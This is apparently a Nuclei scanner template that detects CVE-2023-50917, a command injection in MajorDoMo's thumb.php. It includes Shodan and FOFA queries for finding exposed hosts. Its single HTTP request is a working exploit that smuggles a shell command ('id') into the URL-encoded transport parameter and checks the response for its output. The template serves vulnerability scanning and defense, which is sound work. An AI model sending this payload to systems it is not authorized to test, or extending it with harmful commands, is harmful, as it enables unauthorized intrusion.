nuclei-templates/http/cves/2023/CVE-2023-50917.yaml

49 lines
1.8 KiB
YAML

id: CVE-2023-50917
info:
name: MajorDoMo thumb.php - OS Command Injection
author: DhiyaneshDK
severity: critical
description: |
MajorDoMo (aka Major Domestic Module) before 0662e5e allows command execution via thumb.php shell metacharacters. NOTE: this is unrelated to the Majordomo mailing-list manager.
reference:
- http://packetstormsecurity.com/files/176273/MajorDoMo-Remote-Code-Execution.html
- http://seclists.org/fulldisclosure/2023/Dec/19
- https://github.com/sergejey/majordomo/commit/0662e5ebfb133445ff6154b69c61019357092178
- https://github.com/sergejey/majordomo/commit/3ec3ffb863ea3c2661ab27d398776c551f4daaac
- https://nvd.nist.gov/vuln/detail/CVE-2023-50917
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-50917
cwe-id: CWE-77
epss-score: 0.71101
epss-percentile: 0.97965
cpe: cpe:2.3:a:mjdm:majordomo:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: mjdm
product: majordomo
shodan-query: http.favicon.hash:1903390397
fofa-query: app="MajordomoSL"
tags: packetstorm,seclists,cve,cve2023,majordomo,rce,os
http:
- method: GET
path:
- "{{BaseURL}}/modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B"
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)"
- 'rtsp_transport'
condition: and
- type: status
status:
- 200
# digest: 4a0a004730450220595b1f4c2aad492c7ab53117f7f5878c7d2174357e2700274d277e89dc4b74c5022100ec8ce13cf48cb89871ddb8f797b38eb2776b8811e860285e586747386d5158c4:922c64590222798bb761d5b6d8e72950